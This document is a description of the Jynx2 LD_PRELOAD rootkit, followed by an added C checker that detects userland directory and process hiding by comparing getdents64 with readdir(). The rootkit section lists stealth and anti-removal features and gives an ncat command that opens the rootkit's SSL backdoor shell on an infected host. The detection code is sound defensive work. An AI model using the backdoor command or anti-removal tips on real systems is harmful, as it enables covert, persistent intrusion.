Jynx Rootkit/2.0

Jynx2 is an expansion of the original Jynx LD_PRELOAD rootkit, written in C, with several modifications: multi-factor authentication, a more compatible shell drop, and additional hiding features.

Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable

Protip: It is possible to make Jynx2 even more difficult to remove by hooking C's link() function. For that reason we recommend that any LD_PRELOAD rootkit be removed from a LiveCD: when the system is booted from other media the hooked library is never loaded, so it cannot interfere with its own removal.

Once Jynx2 is successfully installed on a target machine, accessing its accept() hook with the default configuration looks like the following (the magic source port set with -p is privileged, which is why ncat is run with sudo):

[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..

Protip: Make sure to use the --ssl flag with ncat; otherwise Jynx2 will not accept the connection, and the connection's file descriptor will be passed through to the backdoored service instead.
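The hiding features listed above all work by interposing on libc calls such as readdir(), which means a process that asks the kernel directly sees the truth. The following checker is an added example for defenders, not code from the Jynx2 project: it lists a directory twice, once through the raw getdents64 syscall and once through opendir()/readdir(), and reports any entry that libc drops. Run it against /proc to look for hidden PIDs or against a suspect directory to look for hidden files. The function and struct names (count_hidden, raw_dirent64, list_raw, list_libc) are this example's own.

```c
// Added example (not part of Jynx2): detect libc-level directory hiding by
// comparing the raw getdents64 syscall against libc's readdir().
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Record layout returned by getdents64 (same as linux/dirent.h). */
struct raw_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

#define MAX_ENTRIES 65536
#define NAME_MAX_LEN 256
typedef char name_t[NAME_MAX_LEN];

/* Enumerate path through the kernel directly. An LD_PRELOAD hook on
 * readdir() never sees this traffic. Returns entry count or -1. */
static int list_raw(const char *path, name_t *names, int max) {
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (fd < 0) return -1;
    long long bufll[4096];              /* 8-byte aligned scratch buffer */
    char *buf = (char *)bufll;
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof bufll);
        if (nread < 0) { close(fd); return -1; }
        if (nread == 0) break;
        for (long pos = 0; pos < nread; ) {
            struct raw_dirent64 *d = (struct raw_dirent64 *)(buf + pos);
            if (n >= max) { close(fd); return -1; }   /* directory too large */
            snprintf(names[n++], NAME_MAX_LEN, "%s", d->d_name);
            pos += d->d_reclen;
        }
    }
    close(fd);
    return n;
}

/* Enumerate path the way ls, ps and find do: through libc, where a
 * preloaded rootkit can filter the results. Returns entry count or -1. */
static int list_libc(const char *path, name_t *names, int max) {
    DIR *dp = opendir(path);
    if (!dp) return -1;
    struct dirent *de;
    int n = 0;
    while ((de = readdir(dp)) != NULL) {
        if (n >= max) { closedir(dp); return -1; }
        snprintf(names[n++], NAME_MAX_LEN, "%s", de->d_name);
    }
    closedir(dp);
    return n;
}

/* Number of entries the kernel reports that readdir() omits, or -1 on
 * error. The first hidden name is copied into first_hidden when given.
 * Note: a process that exits between the two scans shows up as a false
 * positive on /proc; rerun to confirm before drawing conclusions. */
int count_hidden(const char *path, char *first_hidden, size_t hidden_len) {
    int hidden = -1, nraw, nlib;
    name_t *raw = calloc(MAX_ENTRIES, sizeof(name_t));
    name_t *lib = calloc(MAX_ENTRIES, sizeof(name_t));
    if (!raw || !lib) goto out;
    nraw = list_raw(path, raw, MAX_ENTRIES);
    nlib = list_libc(path, lib, MAX_ENTRIES);
    if (nraw < 0 || nlib < 0) goto out;
    hidden = 0;
    for (int i = 0; i < nraw; i++) {
        int found = 0;
        for (int j = 0; j < nlib && !found; j++)
            found = (strcmp(raw[i], lib[j]) == 0);
        if (!found) {
            if (hidden == 0 && first_hidden && hidden_len)
                snprintf(first_hidden, hidden_len, "%s", raw[i]);
            hidden++;
        }
    }
out:
    free(raw);
    free(lib);
    return hidden;
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "/proc";
    char name[NAME_MAX_LEN] = "";
    int h = count_hidden(path, name, sizeof name);
    if (h < 0) { perror(path); return 2; }
    if (h > 0)
        printf("%s: %d entries hidden from readdir() (first: %s)\n", path, h, name);
    else
        printf("%s: readdir() and getdents64 agree\n", path);
    return h > 0;
}
```

Build it statically (gcc -static) so that LD_PRELOAD has nothing to interpose on at all, or run it from a LiveCD as the protip above recommends; a dynamically linked copy run on the infected host still goes through the preloaded library for every libc call. The check only catches hiding done in userland: a kernel-level rootkit filters the syscall itself, and both listings then agree.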